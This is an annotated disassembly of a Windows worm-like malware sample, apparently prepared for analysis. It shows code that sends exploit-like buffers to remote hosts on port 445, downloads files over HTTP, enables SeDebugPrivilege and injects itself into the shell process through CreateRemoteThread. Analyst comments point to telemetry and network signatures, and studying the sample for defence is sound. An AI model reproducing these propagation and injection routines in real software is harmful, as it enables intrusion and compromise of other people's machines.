call dword_31421128 ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31421124 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31421134 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_31421422 push esi call sub_31422CB9 mov esi, dword_3142112C pop ecx pop ecx push ebx call esi ; dword_3142112C push edi call esi ; dword_3142112C mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_314215C7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_314216A2 proc near ; DATA XREF: sub_314223B2+15Bo push ebx mov ebx, dword_31421098 push esi push edi loc_314216AB: ; CODE XREF: sub_314216A2+88j xor esi, esi mov edi, 46021h loc_314216B2: ; CODE XREF: sub_314216A2+86j inc esi inc esi call sub_31422038 test eax, eax jz short loc_314216FC mov al, byte_31424080[esi+esi*4] push eax push off_31424081[esi+esi*4] call sub_314215C7 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314216FC push 0 push offset dword_31425004 call ebx ; dword_31421098 push 0 push offset dword_31424FEC call ebx ; dword_31421098 loc_314216FC: ; CODE XREF: sub_314216A2+19j ; sub_314216A2+46j call dword_314210FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31422068 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_31421094 ; Sleep cmp esi, 16h jb short loc_314216B2 jmp loc_314216AB sub_314216A2 endp ; =============== S U B R O U T I N E ======================================= sub_3142172F proc near ; CODE XREF: sub_31421422+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31421034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; dword_31421034 test eax, eax jnz short loc_3142175C push 8 push 1 push edi push edi push ebx call 
esi ; dword_31421034 test eax, eax jnz short loc_3142175C push 1 pop eax jmp short loc_3142177A ; --------------------------------------------------------------------------- loc_3142175C: ; CODE XREF: sub_3142172F+19j ; sub_3142172F+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31421038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_3142177A: ; CODE XREF: sub_3142172F+2Bj pop edi pop esi pop ebx retn sub_3142172F endp ; =============== S U B R O U T I N E ======================================= sub_3142177E proc near ; CODE XREF: sub_31421422+180p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3142102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31421030 ; CryptReleaseContext xor eax, eax pop esi retn sub_3142177E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142179A proc near ; CODE XREF: sub_31421422+152p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3142101C ; CryptCreateHash test eax, eax jnz short loc_314217C0 push 1 pop eax jmp short loc_314217FD ; --------------------------------------------------------------------------- loc_314217C0: ; CODE XREF: sub_3142179A+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31421020 ; CryptHashData test eax, eax jnz short loc_314217D9 push 2 pop edi jmp short loc_314217F2 ; --------------------------------------------------------------------------- loc_314217D9: ; CODE XREF: sub_3142179A+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call dword_31421024 ; CryptVerifySignatureA mov 
ecx, [ebp+arg_14] mov [ecx], eax loc_314217F2: ; CODE XREF: sub_3142179A+3Dj push [ebp+arg_0] call dword_31421028 ; CryptDestroyHash mov eax, edi loc_314217FD: ; CODE XREF: sub_3142179A+24j pop edi pop esi pop ebp retn sub_3142179A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421801 proc near ; CODE XREF: sub_3142255F+36p ; sub_314225C3+48p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31422CF0 mov eax, dword_31424C84 push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31424C88 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_31421158 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31421D61 push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_3142115C ; inet_ntoa push eax lea eax, [ebp+var_6C] push eax 
call dword_3142109C ; lstrcpynA lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31424C78 push eax call dword_3142111C ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31421874: ; CODE XREF: sub_31421801+83j mov dl, [ebp+ecx+var_4C] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 28h jl short loc_31421874 push 60h lea eax, [ebp+var_E4] push offset dword_31424798 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl eax, 1 push eax lea eax, [ebp+var_134] push eax lea eax, [ebp+var_B4] push eax call sub_31422CE2 ; memcpy add esp, 1Ch lea eax, [ebp+var_4C] push 9 push (offset aC+3) push eax call sub_31422CDC ; strlen pop ecx lea eax, [ebp+eax*2+var_B5] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen add al, 1Ah push edi shl al, 1 mov [ebp+var_5], al lea eax, [ebp+var_5] push eax lea eax, [ebp+var_E1] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl al, 1 add al, 9 push edi mov [ebp+var_6], al lea eax, [ebp+var_6] push eax lea eax, [ebp+var_B7] push eax call sub_31422CE2 ; memcpy push 0E29h lea eax, [ebp+var_1F28] push 31h push eax call sub_31422CD6 ; memset push 10h lea eax, [ebp+var_24] push ebx push eax call sub_31422CD6 ; memset add esp, 44h mov [ebp+var_24], 2 push 1BDh call dword_31421160 ; ntohs mov [ebp+var_22], ax lea eax, [ebp+var_24] push 10h push eax push [ebp+var_4] mov [ebp+var_20], esi call dword_31421164 ; connect cmp eax, 0FFFFFFFFh jz loc_31421D57 mov esi, dword_31421094 mov edi, 0C8h push edi call esi ; dword_31421094 push ebx mov ebx, dword_31421168 push 89h push offset dword_31424580 push [ebp+var_4] call ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A8h push offset dword_3142460C push [ebp+var_4] call 
ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0DEh push offset dword_314246B8 push [ebp+var_4] call ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp eax, 46h jl loc_31421D4C cmp [ebp+var_730], 31h jnz loc_31421BF7 and [ebp+arg_0], 0 push 7D0h lea eax, [ebp+var_F44] push 90h push eax call sub_31422CD6 ; memset add esp, 0Ch push offset byte_314242B8 call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_EA4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 0Ch lea eax, [ebp+var_14] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_788] push eax call sub_31422CE2 ; memcpy mov eax, dword_31424BBE add esp, 0Ch mov [ebp+var_798], eax loc_31421A98: ; CODE XREF: sub_31421801+4E1j movsx eax, [ebp+var_5] add eax, 4 push 0 push eax lea eax, [ebp+var_E4] push eax push [ebp+var_4] call ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 68h push offset dword_314247FC push [ebp+var_4] call ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A0h push offset dword_31424868 push [ebp+var_4] call ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp [ebp+arg_0], 0 jz loc_31421CE7 push 68h lea eax, [ebp+var_89E4] push offset dword_31424A20 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4834] push 1B5Ah 
push eax lea eax, [ebp+var_897C] push eax call sub_31422CE2 ; memcpy push 70h lea eax, [ebp+var_690C] push offset dword_31424A8C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_37A0] push 0A5Eh push eax lea eax, [ebp+var_689C] push eax call sub_31422CE2 ; memcpy push 84h lea eax, [ebp+var_5DD8] push offset dword_31424B00 push eax call sub_31422CE2 ; memcpy add esp, 3Ch lea eax, [ebp+var_89E4] push 0 push 10FCh push eax push [ebp+var_4] call ebx ; dword_31421168 push edi call esi ; dword_31421094 push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0FDCh lea eax, [ebp+var_690C] jmp loc_31421D3F ; --------------------------------------------------------------------------- loc_31421BF7: ; CODE XREF: sub_31421801+22Bj push 0DACh lea eax, [ebp+var_2CD8] push 90h push eax mov [ebp+arg_0], 1 call sub_31422CD6 ; memset push 4 lea eax, [ebp+var_24F4] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_24E4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21C0] push offset loc_31424C70 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21BC] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy add esp, 40h push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_21B0] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 10h xor ecx, ecx lea eax, [ebp+var_4833] loc_31421C93: ; CODE XREF: sub_31421801+4A8j mov dl, [ebp+ecx+var_2CD8] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 0DACh jl short loc_31421C93 and [ebp+var_2CDC], 0 and [ebp+var_2CDB], 0 push 1C52h lea eax, [ebp+var_89E4] push 31h push eax call sub_31422CD6 ; memset push 1C52h lea eax, [ebp+var_690C] push 31h push eax call sub_31422CD6 ; memset add esp, 18h jmp loc_31421A98 ; 
; ---------------------------------------------------------------------------
; Tail of sub_31421801 (its beginning is outside this part of the listing).
; The visible tail returns [ebp+var_C], which is cleared to 0 only on the
; path that falls through loc_31421D3F.

loc_31421CE7: ; CODE XREF: sub_31421801+339j
        push 7Ch
        lea eax, [ebp+var_1F28]
        push offset dword_3142490C
        push eax
        call sub_31422CE2 ; memcpy
        lea eax, [ebp+var_F44]
        push 7D0h
        push eax
        lea eax, [ebp+var_1EAC]
        push eax
        call sub_31422CE2 ; memcpy
        push 90h
        lea eax, [ebp+var_16DC]
        push offset dword_3142498C
        push eax
        call sub_31422CE2 ; memcpy
        add esp, 24h
        and [ebp+var_1231], 0
        lea eax, [ebp+var_1F28]
        push 0
        push 0CF8h

loc_31421D3F: ; CODE XREF: sub_31421801+3F1j
        push eax
        push [ebp+var_4]
        call ebx ; dword_31421168
        push edi
        call esi ; dword_31421094
        and [ebp+var_C], 0

loc_31421D4C: ; CODE XREF: sub_31421801+1ADj
              ; sub_31421801+1E1j ...
        push 2
        push [ebp+var_4]
        call dword_31421170 ; shutdown

loc_31421D57: ; CODE XREF: sub_31421801+166j
        push [ebp+var_4]
        call dword_31421174 ; closesocket
        pop esi

loc_31421D61: ; CODE XREF: sub_31421801+37j
        mov eax, [ebp+var_C]
        pop edi
        pop ebx
        leave
        retn
sub_31421801 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31421D68 -- asks for SeDebugPrivilege on the current process token.
;   Resolves OpenProcessToken, LookupPrivilegeValueA and AdjustTokenPrivileges
;   by name from advapi32 at run time (through dword_314210A4, presumably
;   GetProcAddress), so these three names show up as strings, not as imports.
;   Bails out silently if any lookup fails; no result is returned to the
;   caller.
;   Locals: var_4 / var_8 = resolved function pointers, var_C = token handle,
;           var_1C..var_10 = privilege structure (count, LUID, attributes).

sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376p

var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4

        push ebp
        mov ebp, esp
        sub esp, 1Ch
        push esi
        push edi
        push offset aAdvapi32 ; "advapi32"
        call dword_314210A8 ; LoadLibraryA
        mov esi, dword_314210A4
        mov edi, eax ; edi = advapi32 module handle
        push offset aOpenprocesstok ; "OpenProcessToken"
        push edi
        call esi ; dword_314210A4
        test eax, eax
        mov [ebp+var_4], eax
        jz short loc_31421DEC
        push offset aLookupprivileg ; "LookupPrivilegeValueA"
        push edi
        call esi ; dword_314210A4
        test eax, eax
        mov [ebp+var_8], eax
        jz short loc_31421DEC
        push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
        push edi
        call esi ; dword_314210A4
        mov esi, eax ; esi now holds the AdjustTokenPrivileges pointer
        test esi, esi
        jz short loc_31421DEC
        lea eax, [ebp+var_C]
        push eax ; out: token handle
        push 20h ; desired access 20h
        call dword_314210A0 ; GetCurrentProcess
        push eax
        call [ebp+var_4] ; OpenProcessToken (resolved above)
        lea eax, [ebp+var_18]
        mov [ebp+var_1C], 1 ; one privilege entry
        push eax ; out: LUID stored at var_18
        push offset aSedebugprivile ; "SeDebugPrivilege"
        push 0
        mov [ebp+var_10], 2 ; attributes = 2
        call [ebp+var_8] ; LookupPrivilegeValueA (resolved above)
        push 0
        push 0
        lea eax, [ebp+var_1C]
        push 10h
        push eax
        push 0
        push [ebp+var_C]
        ; NOTE(review): the auto-comment below is stale. esi was overwritten
        ; with the AdjustTokenPrivileges pointer, so that is what is called.
        call esi ; GetProcAddress

loc_31421DEC: ; CODE XREF: sub_31421D68+28j
              ; sub_31421D68+37j ...
        pop edi
        pop esi
        leave
        retn
sub_31421D68 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31421DF0(arg_0) -- copies this module's image into another process and
; starts a thread there at address arg_0 (the caller passes sub_314223B2).
;   Reads the module base from dword_31425000, follows the header offset at
;   +3Ch and takes the fields at +34h (kept in var_C, used as the requested
;   remote address) and +50h (kept in edi, used as the byte count).
;   Target process: owner of the "Shell_TrayWnd" window, else of the
;   foreground window.
;   VirtualAllocEx and CreateRemoteThread are resolved by name from kernel32.
;   Returns in eax: 0 = thread started, 1 = API lookup failed, 2 = no window,
;   3 = OpenProcess failed, 4 = remote allocation failed, 5 = thread creation
;   failed.
;   Analyst note: the sequence OpenProcess(42Ah) -> VirtualAllocEx ->
;   WriteProcessMemory -> CreateRemoteThread against the shell process is the
;   behaviour to look for in process-access and thread-creation telemetry.

sub_31421DF0 proc near ; CODE XREF: UPX0:3142238Ap

var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        sub esp, 18h
        mov ecx, dword_31425000 ; module base saved at the entry point
        and [ebp+var_4], 0 ; result code defaults to 0
        push ebx
        push esi
        mov eax, [ecx+3Ch]
        push edi
        add eax, ecx
        push offset aKernel32 ; "kernel32"
        mov ecx, [eax+34h]
        mov edi, [eax+50h]
        mov [ebp+var_C], ecx
        call dword_314210B4 ; GetModuleHandleA
        mov esi, dword_314210A4
        mov ebx, eax
        push offset aVirtualallocex ; "VirtualAllocEx"
        push ebx
        call esi ; dword_314210A4
        test eax, eax
        mov [ebp+var_10], eax
        jnz short loc_31421E37

loc_31421E33: ; CODE XREF: sub_31421DF0+54j
        push 1
        jmp short loc_31421E88
; ---------------------------------------------------------------------------

loc_31421E37: ; CODE XREF: sub_31421DF0+41j
        push offset aCreateremoteth ; "CreateRemoteThread"
        push ebx
        call esi ; dword_314210A4
        test eax, eax
        mov [ebp+var_14], eax
        jz short loc_31421E33
        push 0
        push offset aShell_traywnd ; "Shell_TrayWnd"
        call dword_31421110 ; FindWindowA
        test eax, eax
        jnz short loc_31421E65
        call dword_31421114 ; GetForegroundWindow
        test eax, eax
        jnz short loc_31421E65
        push 2
        jmp short loc_31421E88
; ---------------------------------------------------------------------------

loc_31421E65: ; CODE XREF: sub_31421DF0+65j
              ; sub_31421DF0+6Fj
        lea ecx, [ebp+var_8]
        push ecx ; out: owning process id
        push eax
        call dword_31421118 ; GetWindowThreadProcessId
        push [ebp+var_8]
        push 0
        push 42Ah ; requested access mask
        call dword_314210B0 ; OpenProcess
        mov ebx, eax ; ebx = target process handle
        test ebx, ebx
        jnz short loc_31421E8B
        push 3

loc_31421E88: ; CODE XREF: sub_31421DF0+45j
              ; sub_31421DF0+73j
        pop eax ; error code pushed by the failing branch
        jmp short loc_31421EF6
; ---------------------------------------------------------------------------

loc_31421E8B: ; CODE XREF: sub_31421DF0+94j
        push 4
        push 3000h
        push edi
        push [ebp+var_C]
        push ebx
        call [ebp+var_10] ; VirtualAllocEx (resolved above)
        mov esi, dword_3142107C
        test eax, eax
        jz short loc_31421EE9
        lea ecx, [ebp+var_10]
        push ecx
        push edi
        push eax ; source: same address in this process
        push eax ; destination: address returned by the allocation
        push ebx
        call dword_314210AC ; WriteProcessMemory
        ; releases the handle kept in dword_31424FF4 (set from the "uterm19"
        ; mutex at the entry point) before the remote thread starts
        push dword_31424FF4
        call esi ; dword_3142107C
        lea eax, [ebp+var_18]
        xor edi, edi
        push eax
        push edi
        push 1 ; thread parameter = 1
        push [ebp+arg_0] ; thread start address
        push edi
        push edi
        push ebx
        call [ebp+var_14] ; CreateRemoteThread (resolved above)
        cmp eax, edi
        jz short loc_31421ED5
        push eax
        call esi ; dword_3142107C
        jmp short loc_31421EF0
; ---------------------------------------------------------------------------

loc_31421ED5: ; CODE XREF: sub_31421DF0+DEj
        ; thread creation failed: take the "uterm19" mutex again
        push offset aUterm19 ; "uterm19"
        call sub_31421F29
        pop ecx
        mov [ebp+var_4], 5
        jmp short loc_31421EF0
; ---------------------------------------------------------------------------

loc_31421EE9: ; CODE XREF: sub_31421DF0+B2j
        mov [ebp+var_4], 4

loc_31421EF0: ; CODE XREF: sub_31421DF0+E3j
              ; sub_31421DF0+F7j
        push ebx
        call esi ; dword_3142107C
        mov eax, [ebp+var_4]

loc_31421EF6: ; CODE XREF: sub_31421DF0+99j
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31421DF0 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

sub_31421EFB proc near ; CODE XREF: sub_314221C4+Bp
                       ; UPX0:3142234Cp ...
; Body of sub_31421EFB: seeds the C runtime generator with
; GetTickCount() + esp * (low 32 bits of the time-stamp counter).

var_8 = dword ptr -8
var_4 = dword ptr -4

        push ebp
        mov ebp, esp
        push ecx
        push ecx
        push ebx
        push esi
        push edi
        pusha
        rdtsc
        mov [ebp+var_8], eax ; low dword of the time-stamp counter
        popa
        mov [ebp+var_4], esp
        call dword_314210B8 ; GetTickCount
        mov ecx, [ebp+var_4]
        imul ecx, [ebp+var_8]
        add eax, ecx
        push eax
        call dword_314210EC ; srand
        pop ecx
        pop edi
        pop esi
        pop ebx
        leave
        retn
sub_31421EFB endp

; =============== S U B R O U T I N E =======================================

; sub_31421F29(arg_0 = name) -- CreateMutexA(NULL, TRUE, name).
;   Returns the mutex handle in eax. The entry point checks the last-error
;   value for 0B7h after calling this with "uterm19".

sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EAp
                       ; UPX0:31422356p ...

arg_0 = dword ptr 4

        push [esp+arg_0]
        push 1
        push 0
        call dword_314210BC ; CreateMutexA
        retn
sub_31421F29 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31421F38(arg_0 = start routine, arg_4 = parameter) -- starts a thread
; with default attributes and returns the thread handle in eax. The thread id
; is written over the arg_4 stack slot. The handle is not closed here.

sub_31421F38 proc near ; CODE XREF: sub_314223B2+155p
                       ; sub_314223B2+160p ...

arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        lea eax, [ebp+arg_4]
        push eax
        xor eax, eax
        push eax
        push [ebp+arg_4]
        push [ebp+arg_0]
        push eax
        push eax
        call dword_314210C0 ; CreateThread
        pop ebp
        retn
sub_31421F38 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31421F52(arg_0 = start routine, arg_4 = parameter) -- same thread start
; as sub_31421F38, but the returned handle is closed immediately
; (fire-and-forget worker). eax holds the CloseHandle result on return.

sub_31421F52 proc near ; CODE XREF: sub_314221C4+12Cp
                       ; sub_314225C3+5Ap ...

arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        lea eax, [ebp+arg_4]
        push eax
        xor eax, eax
        push eax
        push [ebp+arg_4]
        push [ebp+arg_0]
        push eax
        push eax
        call dword_314210C0 ; CreateThread
        push eax
        call dword_3142107C ; CloseHandle
        pop ebp
        retn
sub_31421F52 endp

; =============== S U B R O U T I N E =======================================

sub_31421F73 proc near ; CODE XREF: sub_314211A0+68p
                       ; sub_31422A9B+3Bp ...
; Body of sub_31421F73(arg_0 = buffer, arg_4 = length): writes `length`
; random lowercase letters ('a' + rand() % 26) and a terminating zero at
; buffer[length]. The buffer must hold length + 1 bytes.

arg_0 = dword ptr 4
arg_4 = dword ptr 8

        push ebx
        mov ebx, [esp+4+arg_0]
        push esi
        push edi
        mov edi, [esp+0Ch+arg_4]
        xor esi, esi
        test edi, edi
        jle short loc_31421F9B

loc_31421F84: ; CODE XREF: sub_31421F73+26j
        call dword_314210FC ; rand
        push 1Ah
        cdq
        pop ecx
        idiv ecx ; edx = rand() % 26
        add dl, 61h
        mov [esi+ebx], dl
        inc esi
        cmp esi, edi
        jl short loc_31421F84

loc_31421F9B: ; CODE XREF: sub_31421F73+Fj
        and byte ptr [ebx+edi], 0
        pop edi
        pop esi
        pop ebx
        retn
sub_31421F73 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_31421FA3(arg_0 = command line, arg_4 = 16-bit value) -- launches a
; process with CreateProcessA.
;   var_54 is a 44h-byte structure cleared with memset; its first dword is
;   set to 44h and arg_4 is stored at var_24. var_10 / var_C receive two
;   handles that are closed afterwards regardless of the call's outcome.
;   Returns the CreateProcessA result in eax.

sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105p

var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 54h
        push esi
        push edi
        push 44h
        xor esi, esi
        pop edi ; edi = 44h (structure size)
        lea eax, [ebp+var_54]
        push edi
        push esi
        push eax
        call sub_31422CD6 ; memset
        mov ax, [ebp+arg_4]
        add esp, 0Ch
        mov [ebp+var_24], ax
        lea eax, [ebp+var_10]
        push eax
        lea eax, [ebp+var_54]
        push eax
        push esi
        push esi
        push esi
        push esi
        push esi
        push esi
        mov [ebp+var_54], edi
        push [ebp+arg_0]
        push esi
        call dword_314210C4 ; CreateProcessA
        push [ebp+var_C]
        mov esi, dword_3142107C
        mov edi, eax ; keep the CreateProcessA result
        call esi ; dword_3142107C
        push [ebp+var_10]
        call esi ; dword_3142107C
        mov eax, edi
        pop edi
        pop esi
        leave
        retn
sub_31421FA3 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3Ep
                       ; sub_31422712+7p ...
; Body of sub_31421FF9: returns the local host's first address in eax.
;   gethostname failure  -> 0
;   gethostbyname failure -> 100007Fh
;   otherwise            -> dword read through the pointer list at +0Ch of
;                           the gethostbyname result

var_34 = byte ptr -34h

        push ebp
        mov ebp, esp
        sub esp, 34h
        lea eax, [ebp+var_34]
        push 31h
        push eax
        call dword_3142114C ; gethostname
        cmp eax, 0FFFFFFFFh
        jnz short loc_3142201A
        call dword_31421150 ; WSAGetLastError
        xor eax, eax
        leave
        retn
; ---------------------------------------------------------------------------

loc_3142201A: ; CODE XREF: sub_31421FF9+15j
        lea eax, [ebp+var_34]
        push eax
        call dword_31421154 ; gethostbyname
        test eax, eax
        jnz short loc_3142202F
        mov eax, 100007Fh
        leave
        retn
; ---------------------------------------------------------------------------

loc_3142202F: ; CODE XREF: sub_31421FF9+2Dj
        mov eax, [eax+0Ch]
        mov eax, [eax]
        mov eax, [eax]
        leave
        retn
sub_31421FF9 endp

; =============== S U B R O U T I N E =======================================

; sub_31422038 -- connectivity check. Calls InternetGetConnectedState and
; normalises the result to 1 (non-zero) or 0 in eax.

sub_31422038 proc near ; CODE XREF: sub_314216A2+12p
                       ; sub_3142255F+22p ...

var_4 = byte ptr -4

        push ecx
        lea eax, [esp+4+var_4]
        push 0
        push eax
        call dword_31421130 ; InternetGetConnectedState
        neg eax
        sbb eax, eax
        neg eax ; eax = (result != 0)
        pop ecx
        retn
sub_31422038 endp

; =============== S U B R O U T I N E =======================================

; sub_3142204E(arg_0 = name) -- opens the named event with access 2 and, if
; it exists, signals it. The opened handle is not closed.

sub_3142204E proc near ; CODE XREF: sub_314223B2+E6p

arg_0 = dword ptr 4

        push [esp+arg_0]
        push 0
        push 2
        call dword_314210CC ; OpenEventA
        test eax, eax
        jz short locret_31422067
        push eax
        call dword_314210C8 ; SetEvent

locret_31422067: ; CODE XREF: sub_3142204E+10j
        retn
sub_3142204E endp

; =============== S U B R O U T I N E =======================================

; sub_31422068 -- returns (rand() << 16) | rand() in eax.

sub_31422068 proc near ; CODE XREF: sub_314216A2+68p
        push esi
        mov esi, dword_314210FC
        push edi
        call esi ; dword_314210FC
        mov edi, eax
        shl edi, 10h
        call esi ; dword_314210FC
        or eax, edi
        pop edi
        pop esi
        retn
sub_31422068 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame
;
; sub_3142207E(arg_0 = connected socket) -- per-connection worker started by
; the accept loop in sub_314221C4.
;   Reads up to 100h bytes of request. If the request contains "GET" and the
;   string at dword_314241F0, it answers with the "HTTP/1.1 200 OK" header,
;   a Content-Length line built from dword_31424FF0, and then the buffer at
;   dword_31424FE8 in chunks of at most 1000h bytes, pausing 64h ms between
;   chunks; a completed transfer increments the counter dword_31424FEC.
;   Any other request gets the short 15h-byte "200 OK" reply plus 3 bytes
;   from dword_31424D38.
;   dword_31421168 is called as (socket, buffer, length, 0) -- presumably
;   send; confirm against the import table.
;   Normal paths end in ExitThread(0) after shutdown/closesocket. The two
;   error paths return 1 (recv failed) or 2 (send failed) without closing the
;   socket.
;   Analyst note: the request pattern and the fixed response headers are
;   usable as network signatures for this file-serving thread.

sub_3142207E proc near ; DATA XREF: sub_314221C4+127o

var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        sub esp, 200h
        push ebx
        mov ebx, [ebp+arg_0] ; ebx = client socket
        push esi
        push edi
        xor edi, edi ; edi = bytes of the file sent so far
        lea eax, [ebp+var_100]
        push edi
        push 100h
        push eax
        push ebx
        call dword_3142116C ; recv
        cmp eax, 0FFFFFFFFh
        jnz short loc_314220AF
        push 1
        jmp loc_3142216A
